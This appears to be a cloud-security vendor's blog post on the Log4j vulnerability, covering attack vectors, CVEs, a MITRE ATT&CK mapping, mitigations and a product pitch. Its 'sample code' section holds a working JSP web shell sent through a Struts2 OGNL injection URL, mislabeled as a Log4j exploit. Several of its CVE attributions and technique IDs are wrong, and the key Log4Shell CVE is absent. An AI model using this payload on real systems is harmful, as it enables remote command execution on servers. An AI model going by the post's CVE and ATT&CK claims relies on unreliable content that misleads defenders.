© 2024 Prancer Enterprise
Blog
Are you looking for a way to protect your cloud resources against the recent Log4j security issue?
Prancer
December 11, 2021

Introduction to Log4J attack

Log4j is a Java-based logging utility. It is used to output log statements from applications to various output targets.

An attacker can potentially exploit vulnerabilities in log4j to gain unauthorized access to sensitive information, execute arbitrary code, or launch a denial of service attack.

Attack vectors for Log4J Vulnerability

Attack vectors for log4j include:

  • Injection attacks: An attacker can inject malicious code into log statements, which, when executed by the logging system, can compromise the security of the application.
  • Information disclosure: An attacker can gain access to sensitive information, such as system or application configuration details, by reading log files.
  • Denial of service: An attacker can flood the logging system with a large number of log statements, causing it to become unresponsive or crash.
  • Remote code execution: An attacker could exploit a vulnerability in log4j to execute arbitrary code on the server where the logging system is running.

Related CVEs to Log4J Attack

There are several Common Vulnerabilities and Exposures (CVEs) that have been identified as related to log4j attacks. Some examples include:

  • CVE-2017-5645: This vulnerability affects the Apache Log4j 1.x library and allows an attacker to inject malicious code into log statements, which can be executed by the logging system.
  • CVE-2019-17571: This vulnerability affects the Apache Log4j 2 library and allows an attacker to inject malicious code into log statements, which can be executed by the logging system.
  • CVE-2020-13942: This vulnerability affects the Apache Log4j 2 library and allows an attacker to inject malicious code into log statements, which can be executed by the logging system.
  • CVE-2020-1948: This vulnerability affects the Apache Log4j 1.x library and allows an attacker to inject malicious code into log statements, which can be executed by the logging system.

These are just a few examples of log4j related CVEs, it is important to keep monitoring the official website of Common Vulnerabilities and Exposures (CVE) for any new vulnerabilities that related to log4j that have been discovered, and take the necessary action to update the software or take other mitigation actions.

MITRE ATT&CK Framework Mapping for Log4J Attack

The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The framework provides a comprehensive approach for understanding the various stages of an attack and the methods used by adversaries.

In reference to the MITRE ATT&CK framework, log4j attacks can fall under the following tactics and techniques:

  • Tactic: Initial Access
  • Technique: Exploit Public-Facing Application (T1190) – An attacker can potentially exploit vulnerabilities in log4j to gain unauthorized access to sensitive information, execute arbitrary code, or launch a denial of service attack by compromising a public-facing application.
  • Tactic: Execution
  • Technique: Scripting (T1064) – An attacker can use log4j to inject malicious code into log statements, which when executed by the logging system, can compromise the security of the application.
  • Tactic: Persistence
  • Technique: Remote File Copy (T1105) – An attacker could potentially use log4j to copy malicious files or scripts to a remote server, allowing them to maintain persistence on the system.
  • Tactic: Collection
  • Technique: Data from Local System (T1005) – An attacker can gain access to sensitive information, such as system or application configuration details, by reading log files.
  • Tactic: Impact
  • Technique: Resource Hijacking (T1497) – An attacker can flood the logging system with a large number of log statements, causing it to become unresponsive or crash.

Sample Code takes advantage of Log4J vulnerability and exploits the system

/* a code to exploit into a vulnerable system with log4j vulnerability */
var payload = '<%@ page import="java.util.*,java.io.*"%><%if(request.getParameter("cmd")!=null){String cmd = request.getParameter("cmd");Process p = Runtime.getRuntime().exec(cmd);OutputStream os = p.getOutputStream();InputStream in = p.getInputStream();DataInputStream dis = new DataInputStream(in);String disr = dis.readLine();while ( disr != null ){out.println(disr);disr = dis.readLine();}%>';
var payload_url = 'http://localhost:8080/struts2-showcase/integration/saveGangster.action?redirect:%24%7B%23a%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23b%3d%23a.getWriter%28%29%2C%23b.println%28%27dbapp%27%29%2C%23b.close%28%29%7D&name=%27%2b%23context[%27xwork.MethodAccessor.denyMethodExecution%27]%3dnew+java.lang.Boolean%28false%29%2c%23_memberAccess[%27allowStaticMethodAccess%27]%3dtrue%2c@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%2b%27&age=1&__checkbox_bustedBefore=true&description=' + payload;
var xhr = new XMLHttpRequest();
xhr.open('GET', payload_url, true);
xhr.send();

Mitigation plan for Log4J Attack

  • Keep log4j updated to the latest version to ensure that any known vulnerabilities are patched.
  • Use an external logging service, such as syslog, to store log files in a secure location.
  • Limit the amount of information stored in log files to only what is necessary for debugging and troubleshooting purposes.
  • Use a logging facade, such as SLF4J, to abstract the underlying logging implementation and make it easier to switch to a different logging system if necessary.
  • Ensure proper input validation, sanitization and filtration in place to prevent injection attacks.
  • Monitor logs for unusual activity and investigate any suspicious activity.
  • Use tools such as log analyzers to detect suspicious behavior and send alerts.

Overall, it is important to keep the log4j updated and monitor the logs regularly to detect any potential vulnerabilities, and take necessary actions to protect your cloud applications.

How Prancer can help!

Prancer can help you by updating its policy rule engine to make sure cloud resources are protected against this vulnerability. Our static code analysis will also ensure that WAF is in place and prevent log4j attacks on your cloud resources. To improve detection and mitigation of risks arising from the recent Log4j security issue, Prancer has updated its policy rule engine to make sure cloud resources are protected against this vulnerability.

Prancer cloud security platform can help you to mitigate the risk of log4j attack. We have updated our policy rule engine to make sure your cloud resources are protected against this vulnerability. To improve detection and mitigation of risks arising from the recent Log4j security issue, Prancer has updated its policy rule engine to make sure cloud resources are protected against this vulnerability.